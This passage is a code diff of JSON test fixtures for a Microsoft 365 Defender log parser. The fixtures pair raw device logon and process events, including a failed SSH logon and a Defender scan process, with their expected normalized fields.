"Syst\u00e8me" + ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json @@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + "-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + "working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..5a90081c8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -30,6 +30,7 @@ "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", "ProcessVersionInfoCompanyName": "Microsoft Corporation", "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", "ProcessVersionInfoInternalFileName": "MpCmdRun", @@ -69,31 +70,33 @@ "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index d2e83b32a..9b0327128 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -1,6 +1,12 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 